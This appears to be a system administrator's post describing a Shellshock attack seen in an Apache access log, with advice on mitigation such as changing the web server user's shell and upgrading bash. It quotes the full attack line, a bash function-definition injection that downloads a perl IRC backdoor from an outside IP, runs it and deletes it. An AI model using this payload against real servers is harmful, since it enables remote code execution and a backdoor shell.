Entry from my Linux Apache2 access-log:
1038 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl
/var/tmp/wow1;rm -rf /var/tmp/wow1\""
wow1 is a hacked stealth IRC perl script that will give the hacker shell
access. If that script is present in /var/tmp, chances are your hacker is
still in your box. If it is not, it does not mean you are safe.
This command (from the log entry above) downloads the script to your system:
wget -O /var/tmp/wow1 208.118.61.44
This one executes it:
perl /var/tmp/wow1
And when it exits, it is deleted.
rm -rf /var/tmp/wow1
THINGS YOU (or your administrator) CAN DO:
Find the user credentials your web server executes as in /etc/passwd and change
the login shell to /bin/false -- or something that doesn't exist. Then restart
apache. If the web server can't invoke a shell, it can't set a variable or
call /bin/bash to do the hacker's dirty work.
Be advised that this work-around will only patch the hole in your web server.
Many other exploits are possible.
Upgrade bash to 4.3.25 immediately, and hide all other shells. At least one
version each of sh and csh have been found to have the same vulnerability.
Don't leave them where a hacker can expect to find them.
